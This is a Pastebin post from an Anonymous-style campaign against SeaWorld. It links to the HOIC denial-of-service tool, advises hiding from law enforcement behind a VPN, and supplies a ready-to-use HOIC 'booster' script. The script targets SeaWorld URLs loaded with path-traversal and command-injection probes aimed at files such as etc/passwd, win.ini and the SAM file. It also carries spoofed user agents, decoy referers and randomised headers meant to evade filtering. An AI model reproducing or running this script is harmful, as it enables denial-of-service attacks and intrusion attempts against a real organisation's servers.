Advertisement
Guest User

Seaworld_HOIC_booster

a guest
Nov 23rd, 2013
409
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.34 KB | None | 0 0
  1. #OpKillingBay #Anonymous #OpKillingBay #Anonymous #OpKillingBay #Anonymous #OpKillingBay #Anonymous
  2. ###################################################################################################
  3. FUCK s34w0rld ---- U will mend your ways ---- or we will mend them for you
  4. ###################################################################################################
  5.  
  6. --- FIRST AND FOREMOST.... DO NOT!!! I REPEAT DO NOT ENGAGE IN DDoS UNLESS YOU ARE USING VPN OR ---
  7. A PROXY YOU TRUST... THAT MEANS DON'T USE HIDEMYASS THEY WILL GIVE YOU UP TO THE FEDZ ITS A FACT
  8. I HAD A GOOD TUTURIAL FOR ALL THIS ON ANONPASTE BUT INTERPOL TOOK THOSE SERVERS SO...OH WELL...
  9. .....SAIL SAFE
  10. #AG3NTbl4ck
  11. ###################################################################################################
  12. DOWNLOAD HOIC: http://zerohacking.blogspot.nl/2013/01/hoic-ddos-attack-tool.html
  13. (some instruction for n00bs)
  14. or here .... https://thepiratebay.sx/torrent/7312924/
  15. or here .... https://torcache.net/torrent/C8B58EBEA4D745003F048D4EF50DF95155FDCD93.torrent
  16.  
  17. ###################################################################################################
  18. then copy\paste everything below into a txt file but name it using .hoic as the file extension
  19. its a booster designed for them specially to activate the firewall for each request which causes
  20. their server to do extra logging etc. so will hopefully keep it busy enough to put it in the dirt
  21. ###################################################################################################
  22.  
  23. Dim useragents() as String
  24. Dim referers() as String
  25. dim randheaders() as string
  26. Dim randURLs() as string
  27.  
  28. // populate rotating urls
  29. // IF YOU WANT TO IMPROVE THE ATTACK, ADD URLS BELONGING TO THIS DOMAIN OR RELATED SUBDOMAINS!!! PRO-TIP: You should create anew target and .HOIC file if u want to attack a different organization
  30. randURLs.Append "http://seaworldparks.com/en/seaworld-sandiego?from=swportal&__utma=1.1098751336.1385183162.1385183162.1385183162.1&__utmb=1.3.10.1385185972&__utmc=1&__utmx=-&__utmz=1.1385183162.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)&__utmv=-&__utmk=47021223"
  31. randURLs.Append "http://seaworldparks.com/en/seaworld-sandiego?from=swportal&__utma=1.1098751336.1385183162.1385183162.1385183162.1&__utmb=1.3.10.1385185972&__utmc=1&__utmx=-&__utmz=1.1385183162.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)&__utmv=-&__utmk=47021223"
  32. randURLs.Append "http://seaworldparks.com/en/seaworld-sandiego?from=swportal&__utma=1.1098751336.1385183162.1385183162.1385183162.1&__utmb=1.3.10.1385185972&__utmc=1&__utmx=-&__utmz=1.1385183162.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)&__utmv=-&__utmk=47021223"
  33. randURLs.Append "http://seaworld.com/celebration"
  34. randURLs.Append "http://www.seaworld.com/iisadmpwd/aexp2b.htr"
  35. randURLs.Append "http://www.seaworld.com/..\..\..\..\..\..\temp\temp.class"
  36. randURLs.Append "http://www.seaworld.com/_vti_txt/_vti_cnf/"
  37. randURLs.Append "http://www.seaworld.com/cgi/echo.bat"
  38. randURLs.Append "http://www.seaworld.com/cgi/hello.bat?&dir+c:\"
  39. randURLs.Append "http://www.seaworld.com/scripts/tools/newdsn.exe"
  40. randURLs.Append "http://www.seaworld.com/................../etc/passwd"
  41. randURLs.Append "http://www.seaworld.com/cgi/post32.exe|dir%20c:\"
  42. randURLs.Append "http://www.seaworld.com/_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611"
  43. randURLs.Append "http://www.seaworld.com/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd"
  44. randURLs.Append "http://www.seaworld.com/cgi/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00"
  45. randURLs.Append "http://www.seaworld.com/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini"
  46. randURLs.Append "http://www.seaworld.com/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
  47. randURLs.Append "http://www.seaworld.com/cgibin/echo.bat"
  48. randURLs.Append "http://www.seaworld.com/.../.../.../.../.../.../.../.../.../boot.ini"
  49. randURLs.Append "http://www.seaworld.com/bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00"
  50. randURLs.Append "http://www.seaworld.com/bin/echo.bat"
  51. randURLs.Append "http://www.seaworld.com/../../../../../../../../../../etc/*"
  52. randURLs.Append "http://www.seaworld.com/cgibin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
  53. randURLs.Append "http://www.seaworld.com/_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611"
  54. randURLs.Append "http://www.seaworld.com/_vti_bin/shtml.exe/junk_nonexistant.exe"
  55. randURLs.Append "http://www.seaworld.com/DomainFiles/*//../../../../../../../../../../etc/passwd"
  56. randURLs.Append "http://www.seaworld.com/iisadmpwd/aexp3.htr"
  57. randURLs.Append "http://www.seaworld.com/cgibin/hello.bat?&dir+c:\"
  58. randURLs.Append "http://www.seaworld.com/scripts/iisadmin/bdir.htr"
  59. randURLs.Append "http://www.seaworld.com/bin/cgitest.exe"
  60. randURLs.Append "http://www.seaworld.com/cgi/cmd.exe?/c+dir"
  61. randURLs.Append "http://www.seaworld.com/iisadmpwd/aexp4.htr"
  62. randURLs.Append "http://www.seaworld.com/../../../../../../../../../../etc/passw*"
  63. randURLs.Append "http://www.seaworld.com/scripts/httpodbc.dll"
  64. randURLs.Append "http://www.seaworld.com/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c"
  65. randURLs.Append "http://www.seaworld.com/iisadmin/"
  66. randURLs.Append "http://www.seaworld.com/cgi/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
  67. randURLs.Append "http://www.seaworld.com/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
  68. randURLs.Append "http://www.seaworld.com/passwords/"
  69. randURLs.Append "http://www.seaworld.com/msadc/samples/adctest.asp"
  70. randURLs.Append "http://www.seaworld.com/cfdocs/expeval/sendmail.cfm"
  71. randURLs.Append "http://www.seaworld.com/../config.dat"
  72. randURLs.Append "http://www.seaworld.com/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini"
  73. randURLs.Append "http://www.seaworld.com/bin/cmd.exe?/c+dir"
  74. randURLs.Append "http://www.seaworld.com/bin/hello.bat?&dir+c:\"
  75. randURLs.Append "http://www.seaworld.com/_vti_pvt/writeto.cnf"
  76. randURLs.Append "http://www.seaworld.com/../webserver.ini"
  77. randURLs.Append "http://www.seaworld.com/file/../../../../../../../../etc/"
  78. randURLs.Append "http://www.seaworld.com/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini"
  79. randURLs.Append "http://www.seaworld.com/_vti_bin/shtml.exe"
  80. randURLs.Append "http://www.seaworld.com/bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,"
  81. randURLs.Append "http://www.seaworld.com/bin/echo.bat?&dir+c:\"
  82. randURLs.Append "http://www.seaworld.com/../../../../winnt/repair/sam._"
  83. randURLs.Append "http://www.seaworld.com/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini"
  84. randURLs.Append "http://www.seaworld.com/cgibin/post32.exe|dir%20c:\"
  85. randURLs.Append "http://www.seaworld.com/bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
  86. randURLs.Append "http://www.seaworld.com/c/winnt/system32/cmd.exe?/c+dir+/OG"
  87. randURLs.Append "http://www.seaworld.com/WS_FTP.LOG"
  88. randURLs.Append "http://www.seaworld.com////./../.../boot.ini"
  89. randURLs.Append "http://www.seaworld.com/.nsf/../winnt/win.ini"
  90. randURLs.Append "http://www.seaworld.com/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd"
  91. randURLs.Append "http://www.seaworld.com/iisadmpwd/aexp2b.htr"
  92. randURLs.Append "http://www.seaworld.com/..\..\..\..\..\..\temp\temp.class"
  93. randURLs.Append "http://www.seaworld.com/_vti_txt/_vti_cnf/"
  94. randURLs.Append "http://www.seaworld.com/cgi/echo.bat"
  95. randURLs.Append "http://www.seaworld.com/cgi/hello.bat?&dir+c:\"
  96. randURLs.Append "http://www.seaworld.com/scripts/tools/newdsn.exe"
  97. randURLs.Append "http://www.seaworld.com/................../etc/passwd"
  98. randURLs.Append "http://www.seaworld.com/cgi/post32.exe|dir%20c:\"
  99. randURLs.Append "http://www.seaworld.com/_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611"
  100. randURLs.Append "http://www.seaworld.com/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd"
  101. randURLs.Append "http://www.seaworld.com/cgi/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00"
  102. randURLs.Append "http://www.seaworld.com/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini"
  103. randURLs.Append "http://www.seaworld.com/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
  104. randURLs.Append "http://www.seaworld.com/cgibin/echo.bat"
  105. randURLs.Append "http://www.seaworld.com/.../.../.../.../.../.../.../.../.../boot.ini"
  106. randURLs.Append "http://www.seaworld.com/bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00"
  107. randURLs.Append "http://www.seaworld.com/bin/echo.bat"
  108. randURLs.Append "http://www.seaworld.com/../../../../../../../../../../etc/*"
  109. randURLs.Append "http://www.seaworld.com/cgibin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
  110. randURLs.Append "http://www.seaworld.com/_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611"
  111. randURLs.Append "http://www.seaworld.com/_vti_bin/shtml.exe/junk_nonexistant.exe"
  112. randURLs.Append "http://www.seaworld.com/DomainFiles/*//../../../../../../../../../../etc/passwd"
  113. randURLs.Append "http://www.seaworld.com/iisadmpwd/aexp3.htr"
  114. randURLs.Append "http://www.seaworld.com/cgibin/hello.bat?&dir+c:\"
  115. randURLs.Append "http://www.seaworld.com/scripts/iisadmin/bdir.htr"
  116. randURLs.Append "http://www.seaworld.com/bin/cgitest.exe"
  117. randURLs.Append "http://www.seaworld.com/cgi/cmd.exe?/c+dir"
  118. randURLs.Append "http://www.seaworld.com/iisadmpwd/aexp4.htr"
  119. randURLs.Append "http://www.seaworld.com/../../../../../../../../../../etc/passw*"
  120. randURLs.Append "http://www.seaworld.com/scripts/httpodbc.dll"
  121. randURLs.Append "http://www.seaworld.com/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c"
  122. randURLs.Append "http://www.seaworld.com/iisadmin/"
  123. randURLs.Append "http://www.seaworld.com/cgi/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
  124. randURLs.Append "http://www.seaworld.com/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
  125. randURLs.Append "http://www.seaworld.com/passwords/"
  126. randURLs.Append "http://www.seaworld.com/msadc/samples/adctest.asp"
  127. randURLs.Append "http://www.seaworld.com/cfdocs/expeval/sendmail.cfm"
  128. randURLs.Append "http://www.seaworld.com/../config.dat"
  129. randURLs.Append "http://www.seaworld.com/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini"
  130. randURLs.Append "http://www.seaworld.com/bin/cmd.exe?/c+dir"
  131. randURLs.Append "http://www.seaworld.com/bin/hello.bat?&dir+c:\"
  132. randURLs.Append "http://www.seaworld.com/_vti_pvt/writeto.cnf"
  133. randURLs.Append "http://www.seaworld.com/../webserver.ini"
  134. randURLs.Append "http://www.seaworld.com/file/../../../../../../../../etc/"
  135. randURLs.Append "http://www.seaworld.com/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini"
  136. randURLs.Append "http://www.seaworld.com/_vti_bin/shtml.exe"
  137. randURLs.Append "http://www.seaworld.com/bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,"
  138. randURLs.Append "http://www.seaworld.com/bin/echo.bat?&dir+c:\"
  139. randURLs.Append "http://www.seaworld.com/../../../../winnt/repair/sam._"
  140. randURLs.Append "http://www.seaworld.com/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini"
  141. randURLs.Append "http://www.seaworld.com/cgibin/post32.exe|dir%20c:\"
  142. randURLs.Append "http://www.seaworld.com/bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
  143. randURLs.Append "http://www.seaworld.com/c/winnt/system32/cmd.exe?/c+dir+/OG"
  144. randURLs.Append "http://www.seaworld.com/WS_FTP.LOG"
  145. randURLs.Append "http://www.seaworld.com////./../.../boot.ini"
  146. randURLs.Append "http://www.seaworld.com/.nsf/../winnt/win.ini"
  147. randURLs.Append "http://www.seaworld.com/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd"
  148.  
  149. // rotate out url
  150. URL = randURLs(RndNumber(0, randURLs.UBound))
  151.  
  152. // EDIT THE FOLLOWING STRINGS TO MAKE YOUR OWN BOOST UNIQUE AND THEREFORE MORE EVASIVE!
  153.  
  154. // populate list
  155. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
  156. useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
  157. useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
  158. useragents.Append "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
  159. useragents.Append "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)"
  160. useragents.Append "Googlebot/2.1 ( http://www.googlebot.com/bot.html) "
  161. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14"
  162. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14"
  163. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13"
  164. useragents.Append "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13"
  165. useragents.Append "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)"
  166. useragents.Append "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
  167. useragents.Append "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
  168. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16"
  169. useragents.Append "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
  170. useragents.Append "Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53"
  171.  
  172. // populate referer list
  173. referers.Append "http://www.google.com/?q=dutch+boy+arrested"
  174. referers.Append "http://www.google.com/?q=dutch+anonymous+hacker"
  175. referers.Append "http://www.google.com/?q=anonymous+hacker"
  176. referers.Append URL
  177. referers.Append "http://www.om.nl/actueel/"
  178. referers.Append "http://www.om.nl/actueel/omtv_0/2010/video_om_congres/"
  179. referers.Append "http://www.om.nl/vast_menu_blok/service/"
  180. referers.Append "http://www.meldmisdaadanoniem.nl/"
  181. referers.Append "http://www.justitie.nl/"
  182. referers.Append "http://www.om.nl/actueel/omtv_0/2010/video_om_congres/"
  183. referers.Append "http://www.om.nl/organisatie/"
  184. referers.Append "http://www.om.nl/vast_menu_blok/contact/"
  185. referers.Append "http://www.om.nl/algemene_onderdelen/sitemap/"
  186. referers.Append "http://www.theregister.co.uk/2010/12/09/wikileaks_ddos_arrest/"
  187.  
  188. // Add random headers
  189. randheaders.Append "Cache-Control: no-cache"
  190. randheaders.Append "If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMT"
  191. randheaders.Append "If-Modified-Since: Tue, 18 Sep 2002 10:34:27 GMT"
  192. randheaders.Append "If-Modified-Since: Mon, 12 Aug 2004 12:54:49 GMT"
  193. randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
  194. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2006 08:49:15 GMT"
  195. randheaders.Append "If-Modified-Since: Fri, 20 Oct 2006 09:34:27 GMT"
  196. randheaders.Append "If-Modified-Since: Mon, 29 Oct 2001 05:17:09 GMT"
  197. randheaders.Append "If-Modified-Since: Tue, 18 Apr 2003 12:54:49 GMT"
  198. randheaders.Append "If-Modified-Since: Sat, 18 Aug 2002 12:54:49 GMT"
  199. randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
  200. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
  201. randheaders.Append "If-Modified-Since: Fri, 20 Jun 2006 09:34:27 GMT"
  202. randheaders.Append "If-Modified-Since: Sun, 13 Oct 2007 11:59:59 GMT"
  203. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2003 12:54:49 GMT"
  204. randheaders.Append "If-Modified-Since: Wed, 30 Jan 2002 01:21:09 GMT"
  205. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
  206. randheaders.Append "If-Modified-Since: Fri, 20 Oct 2008 09:34:27 GMT"
  207. randheaders.Append "If-Modified-Since: Mon, 29 Oct 2007 11:59:59 GMT"
  208. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2001 12:54:49 GMT"
  209.  
  210. Headers.Append "Keep-Alive: 115"
  211. Headers.Append "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7"
  212. Headers.Append "Connection: keep-alive"
  213.  
  214. // ------------------ DO NOT EDIT BELOW THIS LINE
  215.  
  216. // generate random referer
  217. Headers.Append "Referer: " + referers(RndNumber(0, referers.UBound))
  218. // generate random user agent (DO NOT MODIFY THIS LINE)
  219. Headers.Append "User-Agent: " + useragents(RndNumber(0, useragents.UBound))
  220. // Generate random headers
  221. Headers.Append randheaders(RndNumber(0, randheaders.UBound))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement